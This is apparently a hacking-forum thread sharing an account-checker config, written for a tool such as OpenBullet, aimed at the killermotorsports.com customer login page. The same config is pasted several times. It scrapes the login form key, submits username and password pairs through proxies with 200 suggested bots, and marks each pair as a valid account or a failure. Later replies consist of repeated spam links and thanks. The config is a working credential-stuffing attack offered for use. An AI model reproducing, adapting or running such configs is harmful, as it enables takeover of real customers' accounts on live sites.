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  1. [sETTINGS] { "Name": "killermotorsport", "SuggestedBots": 200, "MaxCPM": 0, "LastModified": "2019-07-20T02:23:43.9298417+02:00", "AdditionalInfo": "", "Author": "TheCrackingPepe", "Version": "1.1.3", "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "EncodeData": false, "AllowedWordlist1": "", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [sCRIPT] #GET_REQUEST REQUEST GET "https://www.killermotorsports.com/customer/account/login/" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" PARSE " " LR "nput name=\"form_key\" type=\"hidden\" value=\"" "\" />" -> VAR "KEY" #POST_REQUEST REQUEST POST "https://www.killermotorsports.com/customer/account/loginPost/" CONTENT "form_key=&login%5Busername%5D=&login%5Bpassword%5D=&send=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" KEYCHECK KEYCHAIN Success OR KEY "Logout" KEYCHAIN Failure OR KEY "Invalid login or password" [sETTINGS] { "Name": "killermotorsport", "SuggestedBots": 200, "MaxCPM": 0, "LastModified": "2019-07-20T02:23:43.9298417+02:00", "AdditionalInfo": "", "Author": "TheCrackingPepe", "Version": "1.1.3", "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "EncodeData": false, "AllowedWordlist1": "", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [sCRIPT] #GET_REQUEST REQUEST GET "https://www.killermotorsports.com/customer/account/login/" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" PARSE " " LR "nput name=\"form_key\" type=\"hidden\" value=\"" "\" />" -> VAR "KEY" #POST_REQUEST REQUEST POST "https://www.killermotorsports.com/customer/account/loginPost/" CONTENT "form_key=&login%5Busername%5D=&login%5Bpassword%5D=&send=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" KEYCHECK KEYCHAIN Success OR KEY "Logout" KEYCHAIN Failure OR KEY "Invalid login or password"
  2. [sETTINGS] { "Name": "killermotorsport", "SuggestedBots": 200, "MaxCPM": 0, "LastModified": "2019-07-20T02:23:43.9298417+02:00", "AdditionalInfo": "", "Author": "TheCrackingPepe", "Version": "1.1.3", "IgnoreResponseErrors": false, "MaxRedirects": 8, "NeedsProxies": true, "OnlySocks": false, "OnlySsl": false, "MaxProxyUses": 0, "EncodeData": false, "AllowedWordlist1": "", "AllowedWordlist2": "", "DataRules": [], "CustomInputs": [], "ForceHeadless": false, "AlwaysOpen": false, "AlwaysQuit": false, "DisableNotifications": false, "CustomUserAgent": "", "RandomUA": false, "CustomCMDArgs": "" } [sCRIPT] #GET_REQUEST REQUEST GET "https://www.killermotorsports.com/customer/account/login/" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" PARSE " " LR "nput name=\"form_key\" type=\"hidden\" value=\"" "\" />" -> VAR "KEY" #POST_REQUEST REQUEST POST "https://www.killermotorsports.com/customer/account/loginPost/" CONTENT "form_key=&login%5Busername%5D=&login%5Bpassword%5D=&send=" CONTENTTYPE "application/x-www-form-urlencoded" HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" HEADER "Pragma: no-cache" HEADER "Accept: */*" KEYCHECK KEYCHAIN Success OR KEY "Logout" KEYCHAIN Failure OR KEY "Invalid login or password"
  3. https://m-3loma.cfhttps://m-3loma.cfhttps://m-3loma.cf
  4. https://m-3loma.cfhttps://m-3loma.cfhttps://m-3loma.cfhttps://m-3loma.cf
  5. ze zo


    hopefully this works, will come back if it does
  6. Thanks for the share. I will check these now.
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